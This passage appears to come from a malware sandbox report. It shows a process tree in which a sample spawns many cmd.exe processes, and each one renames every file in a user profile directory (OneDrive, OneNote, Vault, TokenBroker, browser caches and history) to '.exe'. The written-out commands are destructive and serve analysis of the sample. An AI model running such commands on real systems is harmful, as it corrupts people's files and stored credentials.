    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\nso-ZA\*.*" "*.exe"
        5⤵
        
        PID:2176
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\or-IN\*.*" "*.exe"
        5⤵
        
        PID:3096
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pa\*.*" "*.exe"
        5⤵
        
        PID:2184
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pa-Arab-PK\*.*" "*.exe"
        5⤵
        
        PID:2192
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pl\*.*" "*.exe"
        5⤵
        
        PID:1292
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\platforms\*.*" "*.exe"
        5⤵
        
        PID:560
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\prs-AF\*.*" "*.exe"
        5⤵
        
        PID:4720
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pt-BR\*.*" "*.exe"
        5⤵
        
        PID:3092
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pt-PT\*.*" "*.exe"
        5⤵
        
        PID:836
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\*.*" "*.exe"
        5⤵
        
        PID:1032
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\quc\*.*" "*.exe"
        5⤵
        
        PID:1472
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\quz-PE\*.*" "*.exe"
        5⤵
        
        PID:3308
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ro\*.*" "*.exe"
        5⤵
        
        PID:4476
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4856
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ru\*.*" "*.exe"
        5⤵
        
        PID:4880
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\rw\*.*" "*.exe"
        5⤵
        
        PID:3848
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:1844
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sd-Arab-PK\*.*" "*.exe"
        5⤵
        
        PID:2752
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4484
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\si-LK\*.*" "*.exe"
        5⤵
        
        PID:2616
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sk\*.*" "*.exe"
        5⤵
        
        PID:1620
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sl\*.*" "*.exe"
        5⤵
        
        PID:3176
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sq\*.*" "*.exe"
        5⤵
        
        PID:3660
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sr-Cyrl-BA\*.*" "*.exe"
        5⤵
        
        PID:4932
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sr-Cyrl-RS\*.*" "*.exe"
        5⤵
        
        PID:3216
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sr-Latn-RS\*.*" "*.exe"
        5⤵
        
        PID:1052
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sv\*.*" "*.exe"
        5⤵
        
        PID:2292
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sw\*.*" "*.exe"
        5⤵
        
        PID:640
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ta\*.*" "*.exe"
        5⤵
        
        PID:4028
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\te\*.*" "*.exe"
        5⤵
        
        PID:3676
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tg\*.*" "*.exe"
        5⤵
        
        PID:708
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\th\*.*" "*.exe"
        5⤵
        
        PID:1680
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ti\*.*" "*.exe"
        5⤵
        
        PID:924
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tk-TM\*.*" "*.exe"
        5⤵
        
        PID:64
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tn-ZA\*.*" "*.exe"
        5⤵
        
        PID:2116
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tr\*.*" "*.exe"
        5⤵
        
        PID:4516
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tt\*.*" "*.exe"
        5⤵
        
        PID:2336
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ug\*.*" "*.exe"
        5⤵
        
        PID:2288
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\uk\*.*" "*.exe"
        5⤵
        
        PID:4900
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ur\*.*" "*.exe"
        5⤵
        
        PID:920
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\uz-Latn-UZ\*.*" "*.exe"
        5⤵
        
        PID:1652
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\vi\*.*" "*.exe"
        5⤵
        
        PID:4564
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\wo\*.*" "*.exe"
        5⤵
        
        PID:3124
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\xh-ZA\*.*" "*.exe"
        5⤵
        
        PID:880
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\yo-NG\*.*" "*.exe"
        5⤵
        
        PID:4368
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\zh-CN\*.*" "*.exe"
        5⤵
        
        PID:2624
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\zh-TW\*.*" "*.exe"
        5⤵
        
        PID:2136
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\zu-ZA\*.*" "*.exe"
        5⤵
        
        PID:4908
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\de\*.*" "*.exe"
        5⤵
        
        PID:2960
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\es\*.*" "*.exe"
        5⤵
        
        PID:3484
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\fr\*.*" "*.exe"
        5⤵
        
        PID:1680
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\hu\*.*" "*.exe"
        5⤵
        
        PID:2344
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\it\*.*" "*.exe"
        5⤵
        
        PID:3016
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\ja\*.*" "*.exe"
        5⤵
        
        PID:3440
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\ko\*.*" "*.exe"
        5⤵
        
        PID:4472
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\nl\*.*" "*.exe"
        5⤵
        
        PID:2940
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\pl\*.*" "*.exe"
        5⤵
        
        PID:2348
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\pt-BR\*.*" "*.exe"
        5⤵
        
        PID:4120
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\pt-PT\*.*" "*.exe"
        5⤵
        
        PID:2836
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\ru\*.*" "*.exe"
        5⤵
        
        PID:4360
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\sv\*.*" "*.exe"
        5⤵
        
        PID:872
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\tr\*.*" "*.exe"
        5⤵
        
        PID:2356
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\zh-CN\*.*" "*.exe"
        5⤵
        
        PID:4868
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\zh-TW\*.*" "*.exe"
        5⤵
        
        PID:3188
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\*.*" "*.exe"
        5⤵
        
        PID:836
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick.2\*.*" "*.exe"
        5⤵
        
        PID:4304
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Controls\*.*" "*.exe"
        5⤵
        
        PID:2728
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Controls.2\*.*" "*.exe"
        5⤵
        
        PID:5084
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Extras\*.*" "*.exe"
        5⤵
        
        PID:4396
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Layouts\*.*" "*.exe"
        5⤵
        
        PID:3528
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Templates.2\*.*" "*.exe"
        5⤵
        
        PID:3692
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Window.2\*.*" "*.exe"
        5⤵
        
        PID:3440
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Controls\Styles\*.*" "*.exe"
        5⤵
        
        PID:4516
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Controls\Styles\Flat\*.*" "*.exe"
        5⤵
        
        PID:2092
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\logs\setup\*.*" "*.exe"
        5⤵
        
        PID:1748
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\setup\logs\*.*" "*.exe"
        5⤵
        
        PID:3048
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\*.*" "*.exe"
        5⤵
        
        PID:2268
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\Backup\*.*" "*.exe"
        5⤵
        
        PID:1652
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\*.*" "*.exe"
        5⤵
        
        PID:2228
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\*.*" "*.exe"
        5⤵
        
        PID:3696
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\PlayReady\Internet Explorer\*.*" "*.exe"
        5⤵
        
        PID:1532
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\PlayReady\Internet Explorer\Desktop\*.*" "*.exe"
        5⤵
        
        PID:3016
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\PlayReady\Internet Explorer\InPrivate\*.*" "*.exe"
        5⤵
        
        PID:4284
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\PlayReady\Internet Explorer\InPrivate\Desktop\*.*" "*.exe"
        5⤵
        
        PID:2428
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\*.*" "*.exe"
        5⤵
        
        PID:4780
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\*.*" "*.exe"
        5⤵
        
        PID:2132
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileRoaming\*.*" "*.exe"
        5⤵
        
        PID:4268
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\0\*.*" "*.exe"
        5⤵
        
        PID:880
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\1033\*.*" "*.exe"
        5⤵
        
        PID:540
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\AppCache\*.*" "*.exe"
        5⤵
        
        PID:2708
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\*.*" "*.exe"
        5⤵
        
        PID:4560
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\*.*" "*.exe"
        5⤵
        
        PID:1776
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\*.*" "*.exe"
        5⤵
        
        PID:3148
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\CloudStore\*.*" "*.exe"
        5⤵
        
        PID:3648
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\*.*" "*.exe"
        5⤵
        
        PID:708
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer\*.*" "*.exe"
        5⤵
        
        PID:4872
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\History\*.*" "*.exe"
        5⤵
        
        PID:4132
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\IECompatCache\*.*" "*.exe"
        5⤵
        
        PID:2616
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\IECompatUaCache\*.*" "*.exe"
        5⤵
        
        PID:1472
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\IEDownloadHistory\*.*" "*.exe"
        5⤵
        
        PID:680
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\*.*" "*.exe"
        5⤵
        
        PID:2836
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\*.*" "*.exe"
        5⤵
        
        PID:2220
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Notifications\*.*" "*.exe"
        5⤵
        
        PID:4508
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\*.*" "*.exe"
        5⤵
        
        PID:3048
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:1704
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones\*.*" "*.exe"
        5⤵
        
        PID:4620
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3660
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\RoamingTiles\*.*" "*.exe"
        5⤵
        
        PID:4676
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\SettingSync\*.*" "*.exe"
        5⤵
        
        PID:4908
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Shell\*.*" "*.exe"
        5⤵
        
        PID:1360
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\*.*" "*.exe"
        5⤵
        
        PID:4972
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\*.*" "*.exe"
        5⤵
        
        PID:1652
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\*.*" "*.exe"
        5⤵
        
        PID:3616
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\AppCache\0HBWTP13\*.*" "*.exe"
        5⤵
        
        PID:64
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\*.*" "*.exe"
        5⤵
        
        PID:4920
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\*.*" "*.exe"
        5⤵
        
        PID:2716
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\*.*" "*.exe"
        5⤵
        
        PID:1820
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2396
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\NotifyIcon\*.*" "*.exe"
        5⤵
        
        PID:3344
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\*.*" "*.exe"
        5⤵
        
        PID:1532
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\History\Low\*.*" "*.exe"
        5⤵
        
        PID:3796
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012024080220240803\*.*" "*.exe"
        5⤵
        
        PID:1620
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2944
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\IECompatCache\Low\*.*" "*.exe"
        5⤵
        
        PID:4120
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\IECompatUaCache\Low\*.*" "*.exe"
        5⤵
        
        PID:4368
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.IE5\*.*" "*.exe"
        5⤵
        
        PID:3608
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\*.*" "*.exe"
        5⤵
        
        PID:4800
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4456
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.Word\*.*" "*.exe"
        5⤵
        
        PID:2892
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\*.*" "*.exe"
        5⤵
        
        PID:1316
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Low\*.*" "*.exe"
        5⤵
        
        PID:3652
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Virtualized\*.*" "*.exe"
        5⤵
        
        PID:2984
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\951G8FD5\*.*" "*.exe"
        5⤵
        
        PID:5020
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\CFIOOOZS\*.*" "*.exe"
        5⤵
        
        PID:4296
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\GENTSNHI\*.*" "*.exe"
        5⤵
        
        PID:2648
      - C:\Windows\System32\Conhost.exe
        
